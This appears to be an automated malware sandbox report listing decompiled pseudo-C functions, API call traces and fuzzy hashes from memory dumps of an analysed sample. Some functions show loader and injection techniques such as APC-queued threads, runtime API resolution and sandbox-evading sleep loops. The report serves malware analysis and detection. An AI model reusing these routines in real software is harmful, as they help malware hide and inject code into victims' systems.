Opcode ID: c9d8bed92d3e11bafefa54c40e919724d3dce1f5ab010889cda2f94f7ff0b302
Instruction ID: a27159107fb65fc162cd01373ff29d6d235af1e235a8f52f9575b05752763881
Opcode Fuzzy Hash: c9d8bed92d3e11bafefa54c40e919724d3dce1f5ab010889cda2f94f7ff0b302
Instruction Fuzzy Hash: 6831E871A00615ABCB02DBF58C88DCF77BD9F4A3587218516F910D3144EF38DA85BB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E101E74, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e104108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e10410c;
						if( *0x6e10410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e104118;
								if( *0x6e104118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e10410c);
						}
						HeapDestroy( *0x6e104110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e104108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6e104110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e104130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E101F56(E6E101367, E6E101BFA(_a12, 1, 0x6e104118, _t41));
							 *0x6e10410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

APIs

InterlockedIncrement.KERNEL32(6E104108), ref: 6E101E96
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E101EAB

Part of subcall function 6E101F56: CreateThread.KERNELBASE ref: 6E101F6D
Part of subcall function 6E101F56: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E101F82
Part of subcall function 6E101F56: GetLastError.KERNEL32(00000000), ref: 6E101F8D
Part of subcall function 6E101F56: TerminateThread.KERNEL32(00000000,00000000), ref: 6E101F97
Part of subcall function 6E101F56: CloseHandle.KERNEL32(00000000), ref: 6E101F9E
Part of subcall function 6E101F56: SetLastError.KERNEL32(00000000), ref: 6E101FA7

InterlockedDecrement.KERNEL32(6E104108), ref: 6E101EFE
SleepEx.KERNEL32(00000064,00000001), ref: 6E101F18
CloseHandle.KERNEL32 ref: 6E101F34
HeapDestroy.KERNEL32 ref: 6E101F40

Strings

Txt, xrefs: 6E101EAB

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID: Txt
API String ID: 2110400756-4033135041
Opcode ID: 2b35e0632fa5ca0d7637e5d2eb5709e970dc682a5991f8f20279368a5d4f02a9
Instruction ID: 6cc978c5e679c1389b4ccdfdeea092100804fec226bb64148560967df2004e38
Opcode Fuzzy Hash: 2b35e0632fa5ca0d7637e5d2eb5709e970dc682a5991f8f20279368a5d4f02a9
Instruction Fuzzy Hash: 88216D71B01605AFCB009FE988C898A3BA8E776268720C52DF515D3144DF389A8ABB90

Uniqueness

Uniqueness Score: -1.00%

Function 010021C5, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010021C5(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x100d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E010098E4(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E01005DE8(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x010021d2
0x010021d9
0x010021e0
0x010021f4
0x010021ff
0x01002217
0x01002224
0x01002227
0x0100222c
0x01002237
0x0100223b
0x0100224a
0x0100224e
0x0100226a
0x0100226a
0x0100226e
0x0100226e
0x01002273
0x01002277
0x0100227d
0x0100227e
0x01002285
0x0100228b

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 010021F7
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 01002217
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 01002227
CloseHandle.KERNEL32(00000000), ref: 01002277

Part of subcall function 010098E4: RtlAllocateHeap.NTDLL(00000000,00000000,01006788), ref: 010098F0

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 0100224A
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01002252
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01002262

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 1ec574978b5647f60f7dcff722a68bbbe2635b6964e41c833aa2429702961d13
Instruction ID: d1bc4fda1eddb075635020a14ca9b08d93fa8f904ae6392ebf4f32d9ceca61ca
Opcode Fuzzy Hash: 1ec574978b5647f60f7dcff722a68bbbe2635b6964e41c833aa2429702961d13
Instruction Fuzzy Hash: AE211975904249BFEB12EFE4DC48EAEBBB9EB44314F1040A6F650A6290C7758A45EB60

Uniqueness

Uniqueness Score: -1.00%

Function 01001A34, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 01001A6F
IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 01001AF2
StrStrIW.SHLWAPI(00000000,006E0069), ref: 01001B32
SysFreeString.OLEAUT32(00000000), ref: 01001B54

Part of subcall function 01007B9D: SysAllocString.OLEAUT32(0100C2B0), ref: 01007BED

SafeArrayDestroy.OLEAUT32(00000000), ref: 01001BA7
SysFreeString.OLEAUT32(00000000), ref: 01001BB6

Part of subcall function 01008803: Sleep.KERNELBASE(000001F4), ref: 0100884B

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 97a645dd4cc7610c2efc71dd75f8dd4f790a6c4f65109d0b635ba25ec06c5635
Instruction ID: 23cf36909b0557bc28fffa0e507764d6728ce7284652fe91ad53b5082b9d0ffd
Opcode Fuzzy Hash: 97a645dd4cc7610c2efc71dd75f8dd4f790a6c4f65109d0b635ba25ec06c5635
Instruction Fuzzy Hash: 78518935500609AFEB12DFE8C444ADEB7B6FF88700F148868E645DB250E775DD46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E101879, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E101879(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E101072(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e104144 + 0x6e105014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e104144 + 0x6e105151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E10105D(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e104144 + 0x6e105161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e104144 + 0x6e105174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e104144 + 0x6e105189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e104144 + 0x6e10519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E10145E(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

APIs

Part of subcall function 6E101072: HeapAlloc.KERNEL32(00000000,?,6E101303,00000208,00000000,00000000,?,?,?,6E101DD8,?), ref: 6E10107E

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E101B92,?,?,?,?,?,00000002,?,?), ref: 6E10189D
GetProcAddress.KERNEL32(00000000,?), ref: 6E1018BF
GetProcAddress.KERNEL32(00000000,?), ref: 6E1018D5
GetProcAddress.KERNEL32(00000000,?), ref: 6E1018EB
GetProcAddress.KERNEL32(00000000,?), ref: 6E101901
GetProcAddress.KERNEL32(00000000,?), ref: 6E101917

Part of subcall function 6E10145E: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 6E1014BB
Part of subcall function 6E10145E: memset.NTDLL ref: 6E1014DD

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: abcdc206e1ff19f8d32ca2ec44b72cb7b1e4382e2eb61882d8ef6355014e52fd
Instruction ID: 83fa03cd9c2f282f37824db5353b4404f12ec5dc58e3452009d9b38ccf93da02
Opcode Fuzzy Hash: abcdc206e1ff19f8d32ca2ec44b72cb7b1e4382e2eb61882d8ef6355014e52fd
Instruction Fuzzy Hash: 9821607070064BAFDB10DFB9C880EAA77ECEF553187114429E585D7211DF74EA45EB60

Uniqueness

Uniqueness Score: -1.00%

Function 0100A1E3, Relevance: 9.1, APIs: 6, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0100A1E3(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x100d238 = _t10;
				if(_t10 != 0) {
					 *0x100d1a8 = GetTickCount();
					_t12 = E010012ED(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L0100B1E6();
							_t33 = _t14 + _t16;
							_t18 = E0100673B(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E010019D0(_t25) != 0) {
							 *0x100d260 = 1; // executed
						}
						_t12 = E010017EE(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x0100a1e3
0x0100a1e9
0x0100a1ea
0x0100a1f6
0x0100a1fc
0x0100a203
0x0100a213
0x0100a218
0x0100a21f
0x0100a221
0x0100a226
0x0100a22c
0x0100a232
0x0100a23c
0x0100a240
0x0100a242
0x0100a247
0x0100a248
0x0100a249
0x0100a24e
0x0100a254
0x0100a25d
0x0100a25e
0x0100a263
0x0100a269
0x0100a275
0x0100a277
0x0100a277
0x0100a281
0x0100a281
0x0100a205
0x0100a207
0x0100a207
0x0100a28b

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,01005C19,?), ref: 0100A1F6
GetTickCount.KERNEL32 ref: 0100A20A
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,01005C19,?), ref: 0100A226
SwitchToThread.KERNEL32(?,00000001,?,?,?,01005C19,?), ref: 0100A22C
_aullrem.NTDLL(?,?,00000009,00000000), ref: 0100A249
Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,01005C19,?), ref: 0100A263

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID:
API String ID: 507476733-0
Opcode ID: 4a1025b1c11577b6acf831eb92399587c91fce555164cbdc9cbe390c1fe28378
Instruction ID: 13d6fbc7150eb9554f356542be5274b70076e56fb502fd72d381c80ba3f88f79
Opcode Fuzzy Hash: 4a1025b1c11577b6acf831eb92399587c91fce555164cbdc9cbe390c1fe28378
Instruction Fuzzy Hash: F711C272A40311BBF362ABA8DC0DF9A3BE8AB55350F004665FAC5D72C0EA7AD400C761

Uniqueness

Uniqueness Score: -1.00%

Function 6E101F56, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E101F56(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e104140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6e101f6d
0x6e101f73
0x6e101f77
0x6e101f82
0x6e101f8a
0x6e101f93
0x6e101f97
0x6e101f9e
0x6e101fa5
0x6e101fa7
0x6e101fad
0x6e101f8a
0x6e101fb1

APIs

CreateThread.KERNELBASE ref: 6E101F6D
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E101F82
GetLastError.KERNEL32(00000000), ref: 6E101F8D
TerminateThread.KERNEL32(00000000,00000000), ref: 6E101F97
CloseHandle.KERNEL32(00000000), ref: 6E101F9E
SetLastError.KERNEL32(00000000), ref: 6E101FA7

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: fa3439f2aa3501a516d5a62803b1a0b9611b688b0b917ea8d0b8ee5817e10d89
Instruction ID: 13e70a81b19f2b7ef82f8a7e0a6b47ce7741b533ea567c60b7ff914e42945fd8
Opcode Fuzzy Hash: fa3439f2aa3501a516d5a62803b1a0b9611b688b0b917ea8d0b8ee5817e10d89
Instruction Fuzzy Hash: 8BF05E72606A20BBDB125BA08C0CF9FBB69FB0A701F01C40CF60591144CF358A16BBA1

Uniqueness

Uniqueness Score: -1.00%

Function 010017EE, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E010017EE(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E01007B6E();
				if(_t21 != 0) {
					_t59 =  *0x100d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x100d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x100d164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E01005077( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x100d2a4; // 0x460a5a8
					if( *0x100d25c > 5) {
						_t8 = _t26 + 0x100e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x100ea15; // 0x44283a44
						_t27 = _t7;
					}
					E01005A39(_t27, _t27);
					_t31 = E0100165F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x100d270 =  *0x100d270 ^ 0x81bbe65d;
						_t32 = E010098E4(0x60);
						 *0x100d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x100d32c; // 0x56195b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x100d32c; // 0x56195b0
							 *_t51 = 0x100e836;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x100d238, 0, 0x43);
							 *0x100d2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x100d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x100d2a4; // 0x460a5a8
								_t13 = _t58 + 0x100e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x100c2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E01007EC1( ~_v8 &  *0x100d270, 0x100d00c); // executed
								_t42 = E010062D8(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E01008863(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E01007780(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E01001E40(__eflags,  &(_t65[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x100d160();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E010013E3(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x010017ee
0x010017f9
0x010017fc
0x010017ff
0x01001802
0x01001809
0x0100180b
0x01001817
0x01001819
0x01001819
0x01001822
0x01001828
0x0100182d
0x01001847
0x01001853
0x01001855
0x0100185a
0x01001864
0x01001864
0x0100185c
0x0100185c
0x0100185c
0x0100185c
0x0100186b
0x01001878
0x0100187f
0x01001884
0x01001884
0x0100188c
0x0100188f
0x010018b5
0x010018c1
0x010018c6
0x010018cb
0x010018cd
0x010018f9
0x010018fb
0x010018cf
0x010018d3
0x010018d8
0x010018dd
0x010018e4
0x010018ea
0x010018ef
0x010018f5
0x010018fc
0x010018fe
0x01001900
0x0100190f
0x01001915
0x0100191a
0x0100191c
0x0100194c
0x0100194e
0x0100191e
0x0100191e
0x01001924
0x01001931
0x01001937
0x01001937
0x0100193f
0x01001948
0x0100194f
0x01001951
0x01001953
0x0100195a
0x01001967
0x0100196c
0x01001971
0x01001973
0x01001975
0x00000000
0x00000000
0x01001977
0x0100197c
0x0100197e
0x01001985
0x01001989
0x0100198c
0x010019a1
0x010019a5
0x010019aa
0x00000000
0x010019aa
0x0100198e
0x01001990
0x00000000
0x00000000
0x01001996
0x0100199b
0x0100199d
0x0100199f
0x00000000
0x00000000
0x00000000
0x0100199f
0x01001982
0x01001982
0x01001953
0x01001891
0x01001891
0x01001896
0x010019ac
0x010019b0
0x010019b8
0x010019b8
0x00000000
0x010019b0
0x0100189c
0x0100189f
0x010018a9
0x010018b0
0x00000000
0x010019c0
0x010019c0
0x010019c4
0x010019c8
0x010019c8

APIs

Part of subcall function 01007B6E: GetModuleHandleA.KERNEL32(4C44544E,00000000,01001807,00000000,00000000), ref: 01007B7D

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 01001884

Part of subcall function 010098E4: RtlAllocateHeap.NTDLL(00000000,00000000,01006788), ref: 010098F0

memset.NTDLL ref: 010018D3
RtlInitializeCriticalSection.NTDLL(05619570), ref: 010018E4

Part of subcall function 01001E40: memset.NTDLL ref: 01001E55
Part of subcall function 01001E40: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 01001E89
Part of subcall function 01001E40: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 01001E94

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 0100190F
wsprintfA.USER32 ref: 0100193F

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: a2bb816d3d6d67f4d78e35c80f224068eddc9688079ebe7576342d2c6d04f3f6
Instruction ID: 7a2220cf4b1eec884449bd62c1f10b13d95f431d079feb12853ce53b3c8397ae
Opcode Fuzzy Hash: a2bb816d3d6d67f4d78e35c80f224068eddc9688079ebe7576342d2c6d04f3f6
Instruction Fuzzy Hash: E351B571E00215AFFB63EBE8DC84BAE77E8AF04710F044465E2C5D71C5E679D6448BA1

Uniqueness

Uniqueness Score: -1.00%

Function 010086F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010086F0(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E01004EC8(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x100d2a4; // 0x460a5a8
				_t4 = _t24 + 0x100ede0; // 0x5619388
				_t5 = _t24 + 0x100ed88; // 0x4f0053
				_t26 = E01001CCE( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x100d2a4; // 0x460a5a8
						_t11 = _t32 + 0x100edd4; // 0x561937c
						_t48 = _t11;
						_t12 = _t32 + 0x100ed88; // 0x4f0053
						_t52 = E01005115(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x100d2a4; // 0x460a5a8
							_t13 = _t35 + 0x100ee1e; // 0x30314549
							_t37 = E01005DFD(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x100d25c - 6;
								if( *0x100d25c <= 6) {
									_t42 =  *0x100d2a4; // 0x460a5a8
									_t15 = _t42 + 0x100ec2a; // 0x52384549
									E01005DFD(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x100d2a4; // 0x460a5a8
							_t17 = _t38 + 0x100ee18; // 0x56193c0
							_t18 = _t38 + 0x100edf0; // 0x680043
							_t45 = E01009D43(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x100d238, 0, _t52);
						}
					}
					HeapFree( *0x100d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E01009D8B(_t54);
				}
				return _t45;
			}

0x010086f0
0x01008700
0x01008703
0x0100870a
0x0100870c
0x0100870c
0x0100870f
0x01008714
0x0100871b
0x01008728
0x0100872d
0x01008731
0x0100873f
0x0100874d
0x01008751
0x010087e2
0x010087e2
0x01008757
0x01008757
0x0100875c
0x0100875c
0x01008763
0x0100876f
0x01008771
0x01008773
0x01008775
0x0100877c
0x01008787
0x0100878e
0x01008790
0x01008797
0x01008799
0x010087a0
0x010087ab
0x010087ab
0x01008797
0x010087b0
0x010087b5
0x010087bc
0x010087da
0x010087dc
0x010087dc
0x01008773
0x010087ee
0x010087ee
0x010087f0
0x010087f5
0x010087f7
0x010087f7
0x01008802

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05619388,00000000,?,747DF710,00000000,747DF730), ref: 0100873F
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,056193C0,?,00000000,30314549,00000014,004F0053,0561937C), ref: 010087DC
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0100780E), ref: 010087EE

Strings

Uxt, xrefs: 01008745

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Uxt
API String ID: 3298025750-1536154274
Opcode ID: 7ef69c2a746d1b6dc18dcad2d0e39c4475cf700bd91a60d571d953f8ba167e1d
Instruction ID: 7cc506901e7e9d395e7d744ba56eb2387f27140deea1f520e530a69cc4b7073b
Opcode Fuzzy Hash: 7ef69c2a746d1b6dc18dcad2d0e39c4475cf700bd91a60d571d953f8ba167e1d
